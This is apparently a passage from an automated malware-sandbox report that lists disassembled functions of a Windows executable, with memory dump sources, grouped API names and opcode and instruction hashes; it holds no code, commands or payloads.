                                                                                                                    • Opcode Fuzzy Hash: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                                                                                    • Instruction Fuzzy Hash: 43516433624A85D2DB10CF16D5847AD33B5FB94B84F4A8222CB4E93764EF3AE499C701
                                                                                                                    Function 00007FF6560696A8 Relevance: 7.6, APIs: 5, Instructions: 128COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2832842796-0
                                                                                                                    • Opcode ID: 5ddcdf5be155bdd7fae183d3f61eaf0ee1945c0c2493d87505c57e9b0a69a627
                                                                                                                    • Instruction ID: b13154360747f4a6b067e5f97e8063c5c57f5f3f3d12d49774014ba6e3f85066
                                                                                                                    • Opcode Fuzzy Hash: 5ddcdf5be155bdd7fae183d3f61eaf0ee1945c0c2493d87505c57e9b0a69a627
                                                                                                                    • Instruction Fuzzy Hash: FC510D36A18A4682EB54DF26D49456D7760FB88F98F088432EF8E97B66CF3DD444C740
                                                                                                                    Function 00007FF655FE1CEC Relevance: 7.6, APIs: 5, Instructions: 124keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4210589936-0
                                                                                                                    • Opcode ID: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                                                                    • Instruction ID: ace7874e47d98f0b66ce1f8456f41d9cfe4a9e7e5845f92d2b3ce09880425373
                                                                                                                    • Opcode Fuzzy Hash: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                                                                    • Instruction Fuzzy Hash: 43511536B04A928BE7A4CF36CA445A97761FB45B58F080231EE5AA77D5CF38E851CB00
                                                                                                                    Function 00007FF65601BA2C Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 190572456-0
                                                                                                                    • Opcode ID: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                                                                    • Instruction ID: 7727537a042906959a80e8ba647ffbdb46e1e60e25e69bfc5545e40723b6da11
                                                                                                                    • Opcode Fuzzy Hash: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                                                                    • Instruction Fuzzy Hash: AE412B21B19A0281FE11AF169E842B56395BF84BD8F1D4535DD1EEB788EF7EE408C300
                                                                                                                    Function 00007FF65608FF50 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Show$Enable
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2939132127-0
                                                                                                                    • Opcode ID: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                                                                    • Instruction ID: 5ef94d23a60aa68465cb096262c3c033a8a621b03f04f8ce4aa2ece3cd5976ba
                                                                                                                    • Opcode Fuzzy Hash: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                                                                    • Instruction Fuzzy Hash: 5551623290978681FB51CF15D55467937A1EBC4B88F6C4136DA4EA73A0CE3FE449D710
                                                                                                                    Function 00007FF65604D924 Relevance: 7.6, APIs: 5, Instructions: 91sleepwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3382505437-0
                                                                                                                    • Opcode ID: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                                                                                    • Instruction ID: 2e912ebbf25db31245e79a06b00ce82ed0069d5e91407ebf934fc6afc02e9dee
                                                                                                                    • Opcode Fuzzy Hash: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
                                                                                                                    • Instruction Fuzzy Hash: 4131E93660864547E720CF1AE54416973A1F788BA8F440135EE9DD77D4CE7EEC49C700
                                                                                                                    Function 00007FF656063824 Relevance: 7.6, APIs: 5, Instructions: 89windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2256411358-0
                                                                                                                    • Opcode ID: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                                                                                    • Instruction ID: 8bdb642ec5bbf5b7430546addac5871597d387e0aeb2daea25c18d52d37d8373
                                                                                                                    • Opcode Fuzzy Hash: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
                                                                                                                    • Instruction Fuzzy Hash: 11419021D1C68285FBA58B24D6447BA36A0EF40B48F5C2139D54EE61E5CE7FE4CCCB90
                                                                                                                    Function 00007FF656051B34 Relevance: 7.6, APIs: 5, Instructions: 74windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindowwcsstr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2655805287-0
                                                                                                                    • Opcode ID: c96b3dee558e0f0e55b53f66a4f3d4a9b731c61fc9f957ff27ab50b26f9f0e0c
                                                                                                                    • Instruction ID: 63f10467b185b51e3f254426d0d87a2374dd58e76ca6590ea4cf1fe6d967d957
                                                                                                                    • Opcode Fuzzy Hash: c96b3dee558e0f0e55b53f66a4f3d4a9b731c61fc9f957ff27ab50b26f9f0e0c
                                                                                                                    • Instruction Fuzzy Hash: 2321F722B0978246EF54DB12AA042796691FF88FE4F484930EE5DE7791EE3DE444C300
                                                                                                                    Function 00007FF655FE2370 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3225163088-0
                                                                                                                    • Opcode ID: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
                                                                                                                    • Instruction ID: 556cdd716cec732d122d985b499e742b51749636f942051964e289968d29646a
                                                                                                                    • Opcode Fuzzy Hash: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
                                                                                                                    • Instruction Fuzzy Hash: 0C3181319187428AF3908F11A94433E77A1FB85B94F980235D94EA7751EF7EE849CB00
                                                                                                                    Function 00007FF656011F44 Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2067211477-0
                                                                                                                    • Opcode ID: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
                                                                                                                    • Instruction ID: 02233d4102542c19502678c58f1df11f875ba258c49ab8dfcb9afb8c3fbb0cf8
                                                                                                                    • Opcode Fuzzy Hash: 6c75004fdc8f89f48edb4038dcc6ab145b99058f26a8cd052d9a22877b7c3d52
                                                                                                                    • Instruction Fuzzy Hash: 5421A121A0D78282EF19DF62EA10179A3A1AF84BC8F0C4534EE1DA7795DF3EE409C600
                                                                                                                    Function 00007FF65601F9D4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _set_statfp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1156100317-0
                                                                                                                    • Opcode ID: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                                                                                    • Instruction ID: 613073f7a008073179d2ccb457b2e75d5b0e07aeeba1b5288813b9710305b77b
                                                                                                                    • Opcode Fuzzy Hash: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
                                                                                                                    • Instruction Fuzzy Hash: 6311C6A6E1CA0305F6541129EF4237515C17F553B8F8D4734EA7EE67EB8E3EA848C100
                                                                                                                    Function 00007FF65604B748 Relevance: 7.5, APIs: 5, Instructions: 43stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3897988419-0
                                                                                                                    • Opcode ID: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                                                                                    • Instruction ID: 9442417a05427c87f67559ade5ad3bff09cb67c111ebb9c400d21cc81639ce39
                                                                                                                    • Opcode Fuzzy Hash: c2625648870bea748c00488204de808f07a4ef133cb019afb6ef5a542de6e20a
                                                                                                                    • Instruction Fuzzy Hash: 86112A26A1CA4286E7109B26E54032A66A5EF95BC5F1C4034DE8D97659CF6EE489C700
                                                                                                                    Function 00007FF65605D7F8 Relevance: 7.5, APIs: 5, Instructions: 36sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2833360925-0
                                                                                                                    • Opcode ID: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
                                                                                                                    • Instruction ID: 2d5541efc78fa8e69f1abe4573507ea470116600b0b8075f3297e656d53dc3dc
                                                                                                                    • Opcode Fuzzy Hash: e93a488e7ef773f4239d39afdac6f2cad4444a29d3dd75f0fed3b9e62e675ca8
                                                                                                                    • Instruction Fuzzy Hash: C901AC21B1CA0242EB068735E59513D9361EFA5788B5C5236E10FF25A1DF6FE4DEC704
                                                                                                                    Function 00007FF656060008 Relevance: 7.5, APIs: 5, Instructions: 33synchronizationthreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,00007FF6560429AD,?,?,?,00007FF655FF2AB2), ref: 00007FF65606003C
                                                                                                                    • TerminateThread.KERNEL32(?,?,?,00007FF6560429AD,?,?,?,00007FF655FF2AB2), ref: 00007FF656060047
                                                                                                                    • WaitForSingleObject.KERNEL32(?,?,?,00007FF6560429AD,?,?,?,00007FF655FF2AB2), ref: 00007FF656060055
                                                                                                                    • ~SyncLockT.VCCORLIB ref: 00007FF65606005E
                                                                                                                      • Part of subcall function 00007FF65605F7B8: CloseHandle.KERNEL32(?,?,?,00007FF656060063,?,?,?,00007FF6560429AD,?,?,?,00007FF655FF2AB2), ref: 00007FF65605F7C9
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,00007FF6560429AD,?,?,?,00007FF655FF2AB2), ref: 00007FF65606006A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3142591903-0
                                                                                                                    • Opcode ID: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                                                                    • Instruction ID: 07ee02cee19f47fee32b268edc9d9f3720e84d8df8cfb7677bfd29ebafb5af06
                                                                                                                    • Opcode Fuzzy Hash: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                                                                    • Instruction Fuzzy Hash: 6E014C3AA08B4186E7419F16E54022E7360FB88B54F184031DB8E93B55CF3ED89AC740
                                                                                                                    Function 00007FF656011DA0 Relevance: 7.5, APIs: 5, Instructions: 31threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorExitLastThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1611280651-0
                                                                                                                    • Opcode ID: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                                                                    • Instruction ID: 071d8ae2613c23f5ce696f15b87ace5289bb2906a892ecfb11a3b97a505d3e6f
                                                                                                                    • Opcode Fuzzy Hash: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                                                                    • Instruction Fuzzy Hash: D0018F20B0864292EA096B61EA4413C6262FF40B78F585774D63EA36D1DF3EE95CC300
                                                                                                                    Function 00007FF655FE22E8 Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2625713937-0
                                                                                                                    • Opcode ID: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                                                                                    • Instruction ID: 148fb44a3c83206936abac2952a2fc8058315aa98d8fb27ba055be619835d79e
                                                                                                                    • Opcode Fuzzy Hash: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                                                                                    • Instruction Fuzzy Hash: 8D015E2590864385F7559F61FA9833D2772BF45B99F5C4230C51EA72A0EF7EA848C704
                                                                                                                    Function 00007FF65605B5D4 Relevance: 7.5, APIs: 5, Instructions: 26threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 179993514-0
                                                                                                                    • Opcode ID: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                                                                    • Instruction ID: b227607b4f96ce576b4e1509b49c3cc36b7497b6146586e4c7a9c03f2835def0
                                                                                                                    • Opcode Fuzzy Hash: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
